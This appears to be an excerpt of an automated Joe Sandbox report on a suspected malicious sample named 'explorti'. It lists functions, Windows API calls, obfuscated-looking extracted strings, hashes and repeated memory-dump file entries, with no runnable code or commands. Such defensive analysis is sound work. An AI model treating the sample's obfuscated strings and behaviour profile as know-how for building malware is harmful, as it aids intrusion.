Associated: 00000006.00000002.3254091962.0000000000AC0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254150203.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254182982.0000000000AC2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_610000_explorti.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: HlurNa==$HlurOK==$HlusMa==$h
API String ID: 1721193555-1627750263
Opcode ID: 06357b8bf7a64f2393047fe7937fc99d4ee066bce8e9d588968ea2a57cd17fc1
Instruction ID: fd6e5d786b9dd362d0f06e6c32b144df08b6bab022809b003479c0061f8bbbd1
Opcode Fuzzy Hash: 06357b8bf7a64f2393047fe7937fc99d4ee066bce8e9d588968ea2a57cd17fc1
Instruction Fuzzy Hash: 9CD1E370E046149BDB64BB28DC5A7DD7773AB82320F58429CE40A6B3D2DB354ED08BD6

Function 00646E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00646E23
GetFileInformationByHandle.KERNELBASE(?,?), ref: 00646E7D
__dosmaperr.LIBCMT ref: 00646F12

Part of subcall function 00647177: __dosmaperr.LIBCMT ref: 006471AC

Memory Dump Source

Source File: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true

Associated: 00000006.00000002.3253106903.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253129026.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253228629.0000000000679000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000008E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000090D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000915000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000923000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253769064.0000000000924000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254050909.0000000000ABF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254091962.0000000000AC0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254150203.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254182982.0000000000AC2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_610000_explorti.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$HandleInformationType
String ID:
API String ID: 2531987475-0
Opcode ID: 47db0c6def049918c0503cf165b571073a5a2a14e8059eb149c63517708d3a50
Instruction ID: caeab98c1a0a1be0f031aa399dc28596e57a1152a2f6c535976f44cc80207bb0
Opcode Fuzzy Hash: 47db0c6def049918c0503cf165b571073a5a2a14e8059eb149c63517708d3a50
Instruction Fuzzy Hash: F2416F75900604AADB64EFB5E8419AFBBFBEF4A300B10442DF996D3610EB30A805CB21

Function 006182B0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?), ref: 00618454

Strings

h, xrefs: 0061836F

Memory Dump Source

Source File: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true

Associated: 00000006.00000002.3253106903.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253129026.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253228629.0000000000679000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000008E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000090D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000915000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000923000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253769064.0000000000924000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254050909.0000000000ABF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254091962.0000000000AC0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254150203.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254182982.0000000000AC2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_610000_explorti.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: h
API String ID: 1721193555-3415971826
Opcode ID: 903da6c8bfdd953308dbd74affb3ab1f15a3f38c2f4426512288c8d6b5847fbf
Instruction ID: e0728fdb07cd217a9529183b08d10457734da95557b2aeecc6802970755bd8a3
Opcode Fuzzy Hash: 903da6c8bfdd953308dbd74affb3ab1f15a3f38c2f4426512288c8d6b5847fbf
Instruction Fuzzy Hash: DC512670D002189FEB24EB68DD457DDB7B7EB45314F5442A8E818A7381EF349EC08BA5

Function 00626AE0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE ref: 00626B65

Strings

P, xrefs: 00626B3C

Memory Dump Source

Source File: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true

Associated: 00000006.00000002.3253106903.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253129026.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253228629.0000000000679000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000008E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000090D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000915000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000923000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253769064.0000000000924000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254050909.0000000000ABF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254091962.0000000000AC0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254150203.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254182982.0000000000AC2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_610000_explorti.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: P
API String ID: 3472027048-1343716551
Opcode ID: 48c999418e96e99dda720471f287afbe10435547946440993fa74f24e2bf125a
Instruction ID: 88c0368b7fcbf4b79aa22ad68fa858aa0d0e746c9485c4fd28c965a714f425d2
Opcode Fuzzy Hash: 48c999418e96e99dda720471f287afbe10435547946440993fa74f24e2bf125a
Instruction Fuzzy Hash: 94F0F971E00914ABC7007B78DC17B1DBB77A746720F84035CE815672D1DA3459008BD6

Function 00646C99 Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true

Associated: 00000006.00000002.3253106903.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253129026.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253228629.0000000000679000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000008E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000090D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000915000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000923000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253769064.0000000000924000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254050909.0000000000ABF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254091962.0000000000AC0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254150203.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254182982.0000000000AC2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_610000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 488c72e902f99c5afc04a10dfb0ba97e0c483eba6817b8d93b2c96c8b007cdca
Instruction ID: a49b8879b586db1332e9a61c377d889f08ad2407af932489a973c61141dedd82
Opcode Fuzzy Hash: 488c72e902f99c5afc04a10dfb0ba97e0c483eba6817b8d93b2c96c8b007cdca
Instruction Fuzzy Hash: E821C572A052087AEB117B64DC42BAE376B9F43778F204318F9243B2D1DBB05E0596A6

Function 00646F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00646FB3

Memory Dump Source

Source File: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true

Associated: 00000006.00000002.3253106903.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253129026.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253228629.0000000000679000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000008E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000090D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000915000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000923000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253769064.0000000000924000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254050909.0000000000ABF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254091962.0000000000AC0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254150203.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254182982.0000000000AC2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_610000_explorti.jbxd

Yara matches

Similarity

API ID: Time$LocalSpecificSystem
String ID:
API String ID: 2574697306-0
Opcode ID: de28a957597bda110d40cd270323670305672d7e67c17a6fbe4e287b9aef057a
Instruction ID: e770a9b4cfc686762fa3838a295e494850e70d64a7f51b0d7f4da61bf25105b4
Opcode Fuzzy Hash: de28a957597bda110d40cd270323670305672d7e67c17a6fbe4e287b9aef057a
Instruction Fuzzy Hash: D111ECB290020CAADB50DE95D940EDFB7BEAF09314F605266F555E7180EB30EB48CB62

Function 04C00106 Relevance: .1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.3256138952.0000000004C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c00000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88f99873df4b3f71e401d586f6ce40e1b8999391da235f7fd615ce5b5c087eb4
Instruction ID: 43e36a8c8c62ca84faf8ac7155cbf9a6a83b317b89e982bff737079107360712
Opcode Fuzzy Hash: 88f99873df4b3f71e401d586f6ce40e1b8999391da235f7fd615ce5b5c087eb4
Instruction Fuzzy Hash: C801E5EF2491107D7502A5473F58BFBA76EE5C6B30336C92AF406C1486E2985A4E7131

Function 04C00187 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3256138952.0000000004C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c00000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e843b99083c557500e304c48252e0b76eb580fc89ef4ba5e58e3e31b9172e47d
Instruction ID: 209018446330072252f7d85a2c3e593829ef79fc0091a1eca3a501859e2b168e
Opcode Fuzzy Hash: e843b99083c557500e304c48252e0b76eb580fc89ef4ba5e58e3e31b9172e47d
Instruction Fuzzy Hash: DF01ADBB209150AD7242D6933B24BFA6B6AD9C6730335C83BF402C6082E2945A496130

Function 04C00185 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3256138952.0000000004C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c00000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72653f438289660a8833ad24ce4501629b240ea3e15bbf90f728e99f164d6ce4
Instruction ID: 8385d17b5f99b7e6a8a58a878e456f85e3742dc07bcf0141fd22e706cbea9a85
Opcode Fuzzy Hash: 72653f438289660a8833ad24ce4501629b240ea3e15bbf90f728e99f164d6ce4
Instruction Fuzzy Hash: 9CF049EF24A1107D764296833B24BFA6B6ED5C6730335C83BF402C5482E1945F4D6031

Function 04C00190 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3256138952.0000000004C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c00000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0e372fe26a27fe9cff276ab27dcdcd9ded052504ddce748fcc6aab3ea381f11
Instruction ID: 80b39cac4f83216663a3ad3b437f2a146b503c5ecf4610314bd161c41dd27437
Opcode Fuzzy Hash: a0e372fe26a27fe9cff276ab27dcdcd9ded052504ddce748fcc6aab3ea381f11
Instruction Fuzzy Hash: F2F06DEF2591107E7642DA933B24BFA6B6AD5C6730735C877F402C6482E1945A4D6430

Function 04C001A1 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3256138952.0000000004C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c00000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6827de306a888e198c02a67d71db859f6b0e810fe5a5a9799f38a63ee3c2585
Instruction ID: 1c876a252b6ffdf79c606d8e55ec6ed3e76dcfceedeff827fdf5b018dd97880f
Opcode Fuzzy Hash: d6827de306a888e198c02a67d71db859f6b0e810fe5a5a9799f38a63ee3c2585
Instruction Fuzzy Hash: E1F03AEF24D1107D7502D5833B24BFA6BAEEAC6730735C83BF406C2442E1A85E4E6031

Function 04C001C2 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3256138952.0000000004C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c00000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18e0903f42dbd20352be3e1704ccab5f7a60faa700a79b3654c743053fa3d060
Instruction ID: 39293a22c9e8ee39226b2848af2a2e809dba404e0603d5f6b402dff40ed65a1b
Opcode Fuzzy Hash: 18e0903f42dbd20352be3e1704ccab5f7a60faa700a79b3654c743053fa3d060
Instruction Fuzzy Hash: 2DE022EB2081103E6201E1E73B68BFB6B29DAC6730335C86BF402C7042E1984B0EA130

Function 04C001D9 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3256138952.0000000004C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4c00000_explorti.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 089308849c51b55732ff0238c96423152d4e13f55bba377697b0423c1ea1697e
Instruction ID: 6f907897a54c2e95ba24cb49888b60ac4c5f81d7a99fcd01e02640fdee8d5bd4
Opcode Fuzzy Hash: 089308849c51b55732ff0238c96423152d4e13f55bba377697b0423c1ea1697e
Instruction Fuzzy Hash: DDE0D8BF24A010BE7211D6877B54BF67B79DAC5B30334C86BF402C7441E1A85B4DA531

Non-executed Functions

Function 0061E440 Relevance: 14.6, Strings: 11, Instructions: 878COMMON

Download Yara Rule

Strings

UVu=, xrefs: 006204DA
246122658369, xrefs: 0061F647, 0061F924, 006204F7
0657d1, xrefs: 0061FA9E
UFy=, xrefs: 0061F62D, 0061F90A
d4g, xrefs: 0061F6D5
EpPoaRV1, xrefs: 0061E47F
KS==, xrefs: 0061E4A5
111, xrefs: 0061F6B0
KIG+, xrefs: 0061E734
SC==, xrefs: 0061EA1F, 0061EC66
#, xrefs: 00620534

Memory Dump Source

Source File: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true

Associated: 00000006.00000002.3253106903.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253129026.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253228629.0000000000679000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000008E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000090D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000915000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000923000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253769064.0000000000924000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254050909.0000000000ABF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254091962.0000000000AC0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254150203.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254182982.0000000000AC2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_610000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID: #$0657d1$111$246122658369$EpPoaRV1$KIG+$KS==$SC==$UFy=$UVu=$d4g
API String ID: 0-557208438
Opcode ID: 52819ff8bc39cd5611aa3a4b99421082d7f5b004367a8208d7d0759f4ade4f68
Instruction ID: 9b4598e18c6179da38d7826d5763d887271b1d22edf4f056d165455188a778de
Opcode Fuzzy Hash: 52819ff8bc39cd5611aa3a4b99421082d7f5b004367a8208d7d0759f4ade4f68
Instruction Fuzzy Hash: 6872D370A04248DBEF14EF68C949BDDBBB7AF45304F548198E805673C2D7799A88CBD2

Function 00653068 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 006531E3

Strings

1#IND, xrefs: 00654373
1#INF, xrefs: 0065439E
1#SNAN, xrefs: 0065437A
1#QNAN, xrefs: 00654381

Memory Dump Source

Source File: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true

Associated: 00000006.00000002.3253106903.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253129026.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253228629.0000000000679000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000008E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000090D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000915000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000923000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253769064.0000000000924000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254050909.0000000000ABF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254091962.0000000000AC0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254150203.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254182982.0000000000AC2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_610000_explorti.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 68fe718b16333afc07b2faade3e3bd8e29900de85be2fe1b121a16ba7bf31d58
Instruction ID: 238be0fc87b7d37a0a70ae2906c29c83bde380abd511fc8666bb95b76dcc5d29
Opcode Fuzzy Hash: 68fe718b16333afc07b2faade3e3bd8e29900de85be2fe1b121a16ba7bf31d58
Instruction Fuzzy Hash: 24C23B71E086288FDB65CE28DD407E9B3B6EB48746F1441EAD84DE7340E775AE898F40

Function 00652BD0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true

Associated: 00000006.00000002.3253106903.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253129026.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253228629.0000000000679000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000008E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000090D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000915000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000923000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253769064.0000000000924000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254050909.0000000000ABF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254091962.0000000000AC0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254150203.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254182982.0000000000AC2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_610000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction ID: 954db8e754c0939b2dd6f0fd8689649d47c2ef39042853721379b0f62b5414d4
Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction Fuzzy Hash: 67F16E71E0021A9FDF14CFA8D8906EEB7B2FF49315F158269D819AB380D730AE45CB90

Function 0062D312 Relevance: 2.7, Strings: 2, Instructions: 172COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0061247E

Strings

'kbd+g, xrefs: 0062DCEC
'kbd+g, xrefs: 0062D324, 0062DCA4

Memory Dump Source

Source File: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true

Associated: 00000006.00000002.3253106903.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253129026.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253228629.0000000000679000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000008E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000090D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000915000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000923000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253769064.0000000000924000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254050909.0000000000ABF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254091962.0000000000AC0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254150203.0000000000AC1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3254182982.0000000000AC2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_610000_explorti.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: 'kbd+g$'kbd+g
API String ID: 2659868963-644466365
Opcode ID: bad410a10f2f16ae763b1fce57906a9798fc50223ff14832504765a34566d20d
Instruction ID: 36a4519a795c134faf6816f24cc29beadb76f83dbfda6874b0f975d58a869afb
Opcode Fuzzy Hash: bad410a10f2f16ae763b1fce57906a9798fc50223ff14832504765a34566d20d
Instruction Fuzzy Hash: C951A1B1900A169FEB19CF54E8957ADB7F6FF08350F24856AD409EB390D774A980CF50

Function 0062CB1A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,0062CE82,?,?,?,?,0062CEB7,?,?,?,?,?,?,0062C42D,?,00000001), ref: 0062CB33

Memory Dump Source

Source File: 00000006.00000002.3253129026.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true

Associated: 00000006.00000002.3253106903.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253129026.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253228629.0000000000679000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.00000000008E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.000000000090D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000915000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3253264309.0000000000923000.00000040.00000001.01000000.00000007.sdmpDownload File
